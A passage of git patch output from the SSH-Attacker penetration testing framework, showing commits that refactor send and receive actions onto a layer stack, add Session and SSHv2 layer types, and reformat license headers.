b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java index 00398eb9d..60fb293ee 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java @@ -13,6 +13,7 @@ public enum ImplementedLayers implements LayerType { AuthenticationLayer, ConnectionLayer, TransportLayer, + Session, SSHv1; @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index ad5f1040d..ca79b4c5e 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -9,18 +9,25 @@ import de.rub.nds.modifiablevariable.HoldsModifiableVariable; import de.rub.nds.sshattacker.core.connection.AliasedConnection; +import de.rub.nds.sshattacker.core.layer.*; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.*; import de.rub.nds.sshattacker.core.protocol.transport.message.*; +import de.rub.nds.sshattacker.core.session.Session; import de.rub.nds.sshattacker.core.workflow.action.executor.ReceiveMessageHelper; import de.rub.nds.sshattacker.core.workflow.action.executor.SendMessageHelper; +import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import jakarta.xml.bind.annotation.XmlElement; import jakarta.xml.bind.annotation.XmlElementWrapper; import jakarta.xml.bind.annotation.XmlElements; import jakarta.xml.bind.annotation.XmlTransient; + +import java.io.IOException; import java.util.ArrayList; import java.util.Arrays; +import java.util.LinkedList; import java.util.List; public abstract class MessageAction extends ConnectionBoundAction { @@ -159,43 +166,48 @@ public abstract class MessageAction extends ConnectionBoundAction { @XmlElement(type = VersionExchangeMessage.class, name = "VersionExchange"), @XmlElement(type = AsciiMessage.class, name = "AsciiMessage") }) + + + @XmlTransient private LayerStackProcessingResult layerStackProcessingResult; protected List> messages = new ArrayList<>(); + protected List sessions = new ArrayList<>(); - @XmlTransient protected final ReceiveMessageHelper receiveMessageHelper; - @XmlTransient protected final SendMessageHelper sendMessageHelper; + //@XmlTransient protected final ReceiveMessageHelper receiveMessageHelper; + + //@XmlTransient protected final SendMessageHelper sendMessageHelper; public MessageAction() { super(AliasedConnection.DEFAULT_CONNECTION_ALIAS); - receiveMessageHelper = new ReceiveMessageHelper(); - sendMessageHelper = new SendMessageHelper(); + /*receiveMessageHelper = new ReceiveMessageHelper(); + sendMessageHelper = new SendMessageHelper();*/ } public MessageAction(List> messages) { super(AliasedConnection.DEFAULT_CONNECTION_ALIAS); this.messages = new ArrayList<>(messages); - receiveMessageHelper = new ReceiveMessageHelper(); - sendMessageHelper = new SendMessageHelper(); + /*receiveMessageHelper = new ReceiveMessageHelper(); + sendMessageHelper = new SendMessageHelper();*/ } public MessageAction(ProtocolMessage... messages) { super(AliasedConnection.DEFAULT_CONNECTION_ALIAS); this.messages = Arrays.asList(messages); - receiveMessageHelper = new ReceiveMessageHelper(); - sendMessageHelper = new SendMessageHelper(); + /*receiveMessageHelper = new ReceiveMessageHelper(); + sendMessageHelper = new SendMessageHelper();*/ } public MessageAction(String connectionAlias) { super(connectionAlias); - receiveMessageHelper = new ReceiveMessageHelper(); - sendMessageHelper = new SendMessageHelper(); + /*receiveMessageHelper = new ReceiveMessageHelper(); + sendMessageHelper = new SendMessageHelper();*/ } public MessageAction(String connectionAlias, List> messages) { super(connectionAlias); this.messages = new ArrayList<>(messages); - receiveMessageHelper = new ReceiveMessageHelper(); - sendMessageHelper = new SendMessageHelper(); + /*receiveMessageHelper = new ReceiveMessageHelper(); + sendMessageHelper = new SendMessageHelper();*/ } public MessageAction(String connectionAlias, ProtocolMessage... messages) { @@ -264,4 +276,150 @@ private void initEmptyLists() { messages = new ArrayList<>(); } } + + protected void send( + SshContext sshContext, + List> protocolMessagesToSend, + List sessionsToSend) + throws IOException { + LayerStack layerStack = sshContext.getLayerStack(); + + LayerConfiguration authenticationConfiguration = + new SpecificSendLayerConfiguration<>( + ImplementedLayers.AuthenticationLayer, protocolMessagesToSend); + LayerConfiguration transportConfiguration = + new SpecificSendLayerConfiguration<>( + ImplementedLayers.TransportLayer, protocolMessagesToSend); + LayerConfiguration connectionConfiguration = + new SpecificSendLayerConfiguration<>( + ImplementedLayers.ConnectionLayer, protocolMessagesToSend); + LayerConfiguration sessionConfiguration = + new SpecificSendLayerConfiguration<>(ImplementedLayers.Session, sessionsToSend); + + + List layerConfigurationList = + sortLayerConfigurations( + layerStack, + authenticationConfiguration, + transportConfiguration, + connectionConfiguration, + sessionConfiguration); + LayerStackProcessingResult processingResult = layerStack.sendData(layerConfigurationList); + setContainers(processingResult); + } + + private void setContainers(LayerStackProcessingResult processingResults) { + if (processingResults.getResultForLayer(ImplementedLayers.AuthenticationLayer) != null) { + messages = + new ArrayList<>( + processingResults + .getResultForLayer(ImplementedLayers.AuthenticationLayer) + .getUsedContainers()); + } + + if (processingResults.getResultForLayer(ImplementedLayers.Session) != null) { + sessions = + new ArrayList<>( + processingResults + .getResultForLayer(ImplementedLayers.Session) + .getUsedContainers()); + } + + } + + protected void receive( + SshContext sshContext, + List> protocolMessagesToReceive, + List sessionsToReceive){ + LayerStack layerStack = sshContext.getLayerStack(); + + List layerConfigurationList; + if (protocolMessagesToReceive == null + && sessionsToReceive == null) { + layerConfigurationList = getGenericReceiveConfigurations(layerStack); + } else { + layerConfigurationList = + getSpecificReceiveConfigurations( + protocolMessagesToReceive, + sessionsToReceive, + layerStack); + } + + getReceiveResult(layerStack, layerConfigurationList); + } + + private List getGenericReceiveConfigurations(LayerStack layerStack) { + List layerConfigurationList; + LayerConfiguration messageConfiguration = + new GenericReceiveLayerConfiguration(ImplementedLayers.AuthenticationLayer); + LayerConfiguration recordConfiguration = + new GenericReceiveLayerConfiguration(ImplementedLayers.Session); + layerConfigurationList = + sortLayerConfigurations( + layerStack, + messageConfiguration, + recordConfiguration); + return layerConfigurationList; + } + + private List getSpecificReceiveConfigurations( + List> protocolMessagesToReceive, + List sessionsToReceive, + LayerStack layerStack) { + List layerConfigurationList; + + LayerConfiguration messageConfiguration = + new SpecificReceiveLayerConfiguration<>( + ImplementedLayers.AuthenticationLayer, protocolMessagesToReceive); + LayerConfiguration recordConfiguration = + new SpecificReceiveLayerConfiguration<>(ImplementedLayers.Session, sessionsToReceive); + if (sessionsToReceive == null || sessionsToReceive.isEmpty()) { + // always allow (trailing) records when no records were set + // a ReceiveAction actually intended to expect no records is pointless + ((SpecificReceiveLayerConfiguration) recordConfiguration) + .setAllowTrailingContainers(true); + } +/* LayerConfiguration httpConfiguration = + new SpecificReceiveLayerConfiguration<>( + ImplementedLayers.HTTP, httpMessagesToReceive);*/ + applyActionOptionFilters(messageConfiguration); + layerConfigurationList = + sortLayerConfigurations( + layerStack, + + messageConfiguration, + recordConfiguration); + return layerConfigurationList; + } + + private void applyActionOptionFilters(LayerConfiguration messageConfiguration) { + List containerFilters = new LinkedList<>(); + /*if (getActionOptions().contains(ActionOption.IGNORE_UNEXPECTED_APP_DATA)) { + containerFilters.add(new GenericDataContainerFilter(ApplicationMessage.class)); + } + if (getActionOptions().contains(ActionOption.IGNORE_UNEXPECTED_KEY_UPDATE_MESSAGES)) { + containerFilters.add(new GenericDataContainerFilter(KeyUpdateMessage.class)); + } + if (getActionOptions().contains(ActionOption.IGNORE_UNEXPECTED_NEW_SESSION_TICKETS)) { + containerFilters.add(new GenericDataContainerFilter(NewSessionTicketMessage.class)); + } + if (getActionOptions().contains(ActionOption.IGNORE_UNEXPECTED_WARNINGS)) { + containerFilters.add(new WarningAlertFilter()); + }*/ + ((SpecificReceiveLayerConfiguration) messageConfiguration) + .setContainerFilterList(containerFilters); + } + + private void getReceiveResult( + LayerStack layerStack, List layerConfigurationList) { + LayerStackProcessingResult processingResult; + processingResult = layerStack.receiveData(layerConfigurationList); + setContainers(processingResult); + setLayerStackProcessingResult(processingResult); + } + + public void setLayerStackProcessingResult( + LayerStackProcessingResult layerStackProcessingResult) { + this.layerStackProcessingResult = layerStackProcessingResult; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index a4fec0596..c6552ab18 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -237,10 +237,13 @@ public void execute(State state) throws WorkflowExecutionException { throw new WorkflowExecutionException("Action already executed!"); } - LOGGER.debug("Receiving messages for connection alias '{}'...", getConnectionAlias()); + receive(context, expectedMessages, sessions); + + + /*LOGGER.debug("Receiving messages for connection alias '{}'...", getConnectionAlias()); MessageActionResult result = receiveMessageHelper.receiveMessages(context, expectedMessages); - setReceivedMessages(result.getMessageList()); + setReceivedMessages(result.getMessageList());*/ setExecuted(true); String expected = getReadableString(expectedMessages); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java index df47f3c0e..9426f0fa8 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java @@ -15,6 +15,8 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.state.State; import jakarta.xml.bind.annotation.XmlElement; + +import java.io.IOException; import java.lang.reflect.Field; import java.util.Arrays; import java.util.LinkedList; @@ -99,6 +101,17 @@ public void execute(State state) throws WorkflowExecutionException { LOGGER.info("Sending messages (" + connectionAlias + "): " + sending); } + try { + send(context, messages, sessions); + setExecuted(true); + } catch (IOException e) { + /*if (!getActionOptions().contains(ActionOption.MAY_FAIL)) { + tlsContext.setReceivedTransportHandlerException(true); + LOGGER.debug(e); + } + setExecuted(getActionOptions().contains(ActionOption.MAY_FAIL));*/ + } + /*messages.forEach(message -> message.getHandler(context).getPreparator().prepare()); final MessageActionResult result = sendMessageHelper.sendMessages(context, messages.stream()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java index a663fb0d6..947e1c89c 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java @@ -10,14 +10,18 @@ import de.rub.nds.sshattacker.core.connection.Aliasable; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.layer.LayerConfiguration; +import de.rub.nds.sshattacker.core.layer.LayerStack; +import de.rub.nds.sshattacker.core.layer.SpecificReceiveLayerConfiguration; +import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; +import de.rub.nds.sshattacker.core.layer.constant.LayerType; import de.rub.nds.sshattacker.core.state.State; import jakarta.xml.bind.annotation.XmlAccessType; import jakarta.xml.bind.annotation.XmlAccessorType; import jakarta.xml.bind.annotation.XmlTransient; import java.io.Serializable; -import java.util.Collection; -import java.util.LinkedHashSet; -import java.util.Set; +import java.util.*; + import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -137,4 +141,47 @@ public String toCompactString() { } return sb.toString(); } + + public List sortLayerConfigurations( + LayerStack layerStack, LayerConfiguration... unsortedLayerConfigurations) { + return sortLayerConfigurations( + layerStack, new LinkedList<>(Arrays.asList(unsortedLayerConfigurations))); + } + public List sortLayerConfigurations( + LayerStack layerStack, List unsortedLayerConfigurations) { + List sortedLayerConfigurations = new LinkedList<>(); + // iterate over all layers in the stack and assign the correct configuration + // reset configurations to only assign a configuration to the upper most layer + for (LayerType layerType : layerStack.getLayersInStack()) { + ImplementedLayers layer; + try { + layer = (ImplementedLayers) layerType; + } catch (ClassCastException e) { + LOGGER.warn( + "Cannot assign layer " + + layerType.getName() + + "to current LayerStack. LayerType not implemented for TLSAction."); + continue; + } + Optional layerConfiguration = Optional.empty(); + if (layer == ImplementedLayers.SSHv1 + || layer == ImplementedLayers.AuthenticationLayer + || layer == ImplementedLayers.TransportLayer + || layer == ImplementedLayers.ConnectionLayer + || layer == ImplementedLayers.Session) { + layerConfiguration = + unsortedLayerConfigurations.stream() + .filter(layerConfig -> layerConfig.getLayerType().equals(layer)) + .findFirst(); + } + if (layerConfiguration.isPresent()) { + sortedLayerConfigurations.add(layerConfiguration.get()); + unsortedLayerConfigurations.remove(layerConfiguration.get()); + } else { + sortedLayerConfigurations.add( + new SpecificReceiveLayerConfiguration(layerType, new LinkedList<>())); + } + } + return sortedLayerConfigurations; + } } From 55911d582efed36624bf3b3ef331f0a27c436e03 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Steffen=20Bro=C3=9Fler?= Date: Mon, 29 May 2023 16:53:12 +0200 Subject: [PATCH 003/176] Minor Formattting --- .../core/layer/DataContainerFilter.java | 11 ++--- .../SpecificReceiveLayerConfiguration.java | 6 +-- .../layer/SpecificSendLayerConfiguration.java | 6 +-- .../core/workflow/action/MessageAction.java | 44 +++++++------------ .../core/workflow/action/ReceiveAction.java | 2 - .../core/workflow/action/SendAction.java | 1 - .../core/workflow/action/SshAction.java | 2 +- 7 files changed, 24 insertions(+), 48 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java index 2cee75a5a..dbbcfa3b1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java @@ -1,12 +1,10 @@ -/** - * TLS-Attacker - A Modular Penetration Testing Framework for TLS +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, Hackmanit GmbH + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH * - * Licensed under Apache License, Version 2.0 - * http://www.apache.org/licenses/LICENSE-2.0.txt + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 */ - package de.rub.nds.sshattacker.core.layer; import de.rub.nds.sshattacker.core.layer.data.DataContainer; @@ -14,5 +12,4 @@ public abstract class DataContainerFilter { public abstract boolean filterApplies(DataContainer container); - } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java index 1e0afd982..b6b1060bf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java @@ -1,16 +1,14 @@ /* - * TLS-Attacker - A Modular Penetration Testing Framework for TLS + * SSH-Attacker - A Modular Penetration Testing Framework for SSH * * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH * - * Licensed under Apache License, Version 2.0 - * http://www.apache.org/licenses/LICENSE-2.0.txt + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 */ package de.rub.nds.sshattacker.core.layer; import de.rub.nds.sshattacker.core.layer.constant.LayerType; import de.rub.nds.sshattacker.core.layer.data.DataContainer; - import java.util.Arrays; import java.util.List; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificSendLayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificSendLayerConfiguration.java index 52050a975..553e8d593 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificSendLayerConfiguration.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificSendLayerConfiguration.java @@ -1,16 +1,14 @@ /* - * TLS-Attacker - A Modular Penetration Testing Framework for TLS + * SSH-Attacker - A Modular Penetration Testing Framework for SSH * * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH * - * Licensed under Apache License, Version 2.0 - * http://www.apache.org/licenses/LICENSE-2.0.txt + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 */ package de.rub.nds.sshattacker.core.layer; import de.rub.nds.sshattacker.core.layer.constant.LayerType; import de.rub.nds.sshattacker.core.layer.data.DataContainer; - import java.util.List; /** diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index ca79b4c5e..445209793 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -10,20 +10,17 @@ import de.rub.nds.modifiablevariable.HoldsModifiableVariable; import de.rub.nds.sshattacker.core.connection.AliasedConnection; import de.rub.nds.sshattacker.core.layer.*; +import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.*; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import de.rub.nds.sshattacker.core.session.Session; -import de.rub.nds.sshattacker.core.workflow.action.executor.ReceiveMessageHelper; -import de.rub.nds.sshattacker.core.workflow.action.executor.SendMessageHelper; -import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import jakarta.xml.bind.annotation.XmlElement; import jakarta.xml.bind.annotation.XmlElementWrapper; import jakarta.xml.bind.annotation.XmlElements; import jakarta.xml.bind.annotation.XmlTransient; - import java.io.IOException; import java.util.ArrayList; import java.util.Arrays; @@ -166,16 +163,15 @@ public abstract class MessageAction extends ConnectionBoundAction { @XmlElement(type = VersionExchangeMessage.class, name = "VersionExchange"), @XmlElement(type = AsciiMessage.class, name = "AsciiMessage") }) + @XmlTransient + private LayerStackProcessingResult layerStackProcessingResult; - - @XmlTransient private LayerStackProcessingResult layerStackProcessingResult; protected List> messages = new ArrayList<>(); protected List sessions = new ArrayList<>(); + // @XmlTransient protected final ReceiveMessageHelper receiveMessageHelper; - //@XmlTransient protected final ReceiveMessageHelper receiveMessageHelper; - - //@XmlTransient protected final SendMessageHelper sendMessageHelper; + // @XmlTransient protected final SendMessageHelper sendMessageHelper; public MessageAction() { super(AliasedConnection.DEFAULT_CONNECTION_ALIAS); @@ -296,7 +292,6 @@ protected void send( LayerConfiguration sessionConfiguration = new SpecificSendLayerConfiguration<>(ImplementedLayers.Session, sessionsToSend); - List layerConfigurationList = sortLayerConfigurations( layerStack, @@ -324,25 +319,21 @@ private void setContainers(LayerStackProcessingResult processingResults) { .getResultForLayer(ImplementedLayers.Session) .getUsedContainers()); } - } protected void receive( SshContext sshContext, List> protocolMessagesToReceive, - List sessionsToReceive){ + List sessionsToReceive) { LayerStack layerStack = sshContext.getLayerStack(); List layerConfigurationList; - if (protocolMessagesToReceive == null - && sessionsToReceive == null) { + if (protocolMessagesToReceive == null && sessionsToReceive == null) { layerConfigurationList = getGenericReceiveConfigurations(layerStack); } else { layerConfigurationList = getSpecificReceiveConfigurations( - protocolMessagesToReceive, - sessionsToReceive, - layerStack); + protocolMessagesToReceive, sessionsToReceive, layerStack); } getReceiveResult(layerStack, layerConfigurationList); @@ -355,10 +346,7 @@ private List getGenericReceiveConfigurations(LayerStack laye LayerConfiguration recordConfiguration = new GenericReceiveLayerConfiguration(ImplementedLayers.Session); layerConfigurationList = - sortLayerConfigurations( - layerStack, - messageConfiguration, - recordConfiguration); + sortLayerConfigurations(layerStack, messageConfiguration, recordConfiguration); return layerConfigurationList; } @@ -372,23 +360,21 @@ private List getSpecificReceiveConfigurations( new SpecificReceiveLayerConfiguration<>( ImplementedLayers.AuthenticationLayer, protocolMessagesToReceive); LayerConfiguration recordConfiguration = - new SpecificReceiveLayerConfiguration<>(ImplementedLayers.Session, sessionsToReceive); + new SpecificReceiveLayerConfiguration<>( + ImplementedLayers.Session, sessionsToReceive); if (sessionsToReceive == null || sessionsToReceive.isEmpty()) { // always allow (trailing) records when no records were set // a ReceiveAction actually intended to expect no records is pointless ((SpecificReceiveLayerConfiguration) recordConfiguration) .setAllowTrailingContainers(true); } -/* LayerConfiguration httpConfiguration = - new SpecificReceiveLayerConfiguration<>( - ImplementedLayers.HTTP, httpMessagesToReceive);*/ + /* LayerConfiguration httpConfiguration = + new SpecificReceiveLayerConfiguration<>( + ImplementedLayers.HTTP, httpMessagesToReceive);*/ applyActionOptionFilters(messageConfiguration); layerConfigurationList = - sortLayerConfigurations( - layerStack, + sortLayerConfigurations(layerStack, messageConfiguration, recordConfiguration); - messageConfiguration, - recordConfiguration); return layerConfigurationList; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index c6552ab18..a85ad7f62 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -16,7 +16,6 @@ import de.rub.nds.sshattacker.core.protocol.connection.message.*; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import de.rub.nds.sshattacker.core.state.State; -import de.rub.nds.sshattacker.core.workflow.action.executor.MessageActionResult; import jakarta.xml.bind.annotation.XmlElement; import jakarta.xml.bind.annotation.XmlElementWrapper; import jakarta.xml.bind.annotation.XmlElements; @@ -239,7 +238,6 @@ public void execute(State state) throws WorkflowExecutionException { receive(context, expectedMessages, sessions); - /*LOGGER.debug("Receiving messages for connection alias '{}'...", getConnectionAlias()); MessageActionResult result = receiveMessageHelper.receiveMessages(context, expectedMessages); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java index 9426f0fa8..dbd154acf 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java @@ -15,7 +15,6 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.state.State; import jakarta.xml.bind.annotation.XmlElement; - import java.io.IOException; import java.lang.reflect.Field; import java.util.Arrays; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java index 947e1c89c..68449d86b 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java @@ -21,7 +21,6 @@ import jakarta.xml.bind.annotation.XmlTransient; import java.io.Serializable; import java.util.*; - import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -147,6 +146,7 @@ public List sortLayerConfigurations( return sortLayerConfigurations( layerStack, new LinkedList<>(Arrays.asList(unsortedLayerConfigurations))); } + public List sortLayerConfigurations( LayerStack layerStack, List unsortedLayerConfigurations) { List sortedLayerConfigurations = new LinkedList<>(); From 7d9c873b847bf8e3bb028666f18a3a55993ee582 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Steffen=20Bro=C3=9Fler?= Date: Mon, 29 May 2023 17:06:31 +0200 Subject: [PATCH 004/176] Restructuring layer-concept --- .idea/misc.xml | 2 +- .../layer/constant/ImplementedLayers.java | 3 +- .../core/layer/impl/SSH2Layer.java | 230 ++++++++++++++++++ .../core/workflow/action/MessageAction.java | 48 ++-- .../core/workflow/action/SshAction.java | 4 +- 5 files changed, 263 insertions(+), 24 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java diff --git a/.idea/misc.xml b/.idea/misc.xml index d31b37ac7..45478c708 100644 --- a/.idea/misc.xml +++ b/.idea/misc.xml @@ -8,5 +8,5 @@ - + \ No newline at end of file diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java index 60fb293ee..7df24ce40 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java @@ -14,7 +14,8 @@ public enum ImplementedLayers implements LayerType { ConnectionLayer, TransportLayer, Session, - SSHv1; + SSHv1, + SSHv2; @Override public String getName() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java new file mode 100644 index 000000000..0fcc4fc56 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -0,0 +1,230 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.impl; + +/*import de.rub.nds.sshattacker.core.constants.SSL2MessageType; +import de.rub.nds.sshattacker.core.constants.SSL2TotalHeaderLengths; +import de.rub.nds.sshattacker.core.constants.ssl.SSL2ByteLength; +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import de.rub.nds.sshattacker.core.layer.LayerConfiguration; +import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.message.*;*/ + +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; +import de.rub.nds.sshattacker.core.layer.ProtocolLayer; +import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; +import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.IOException; + +public class SSH2Layer extends ProtocolLayer { + + private static final Logger LOGGER = LogManager.getLogger(); + private SshContext context; + + public SSH2Layer(SshContext context) { + super(ImplementedLayers.SSHv2); + this.context = context; + } + + @Override + public LayerProcessingResult sendConfiguration() throws IOException { + /*LayerConfiguration configuration = getLayerConfiguration(); + if (configuration != null && !configuration.getContainerList().isEmpty()) { + for (ProtocolMessage ssl2message : configuration.getContainerList()) { + ProtocolMessagePreparator preparator = ssl2message.getPreparator(context); + preparator.prepare(); + preparator.afterPrepare(); + ssl2message.getHandler(context).adjustContext(ssl2message); + ProtocolMessageSerializer serializer = ssl2message.getSerializer(context); + byte[] serializedMessage = serializer.serialize(); + ssl2message.setCompleteResultingMessage(serializedMessage); + ssl2message.getHandler(context).adjustContextAfterSerialize(ssl2message); + ssl2message.getHandler(context).updateDigest(ssl2message, true); + getLowerLayer() + .sendData( + new RecordLayerHint(ssl2message.getProtocolMessageType()), + serializedMessage); + addProducedContainer(ssl2message); + } + } + return getLayerResult();*/ + return null; + } + + @Override + public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] additionalData) + throws IOException { + return sendConfiguration(); + } + + @Override + public LayerProcessingResult receiveData() { + + /*try { + int messageLength = 0; + byte paddingLength = 0; + byte[] totalHeader; + HintedInputStream dataStream = null; + SSL2MessageType messageType; + try { + + dataStream = getLowerLayer().getDataStream(); + totalHeader = dataStream.readNBytes(SSL2ByteLength.LENGTH); + + if (SSL2TotalHeaderLengths.isNoPaddingHeader(totalHeader[0])) { + messageLength = resolveUnpaddedMessageLength(totalHeader); + paddingLength = 0x00; + } else { + messageLength = resolvePaddedMessageLength(totalHeader); + paddingLength = dataStream.readByte(); + } + messageType = SSL2MessageType.getMessageType(dataStream.readByte()); + } catch (IOException e) { + LOGGER.warn( + "Failed to parse SSL2 message header, parsing as unknown SSL2 message", e); + messageType = SSL2MessageType.SSL_UNKNOWN; + } + + SSL2Message message = null; + + switch (messageType) { + case SSL_CLIENT_HELLO: + message = new 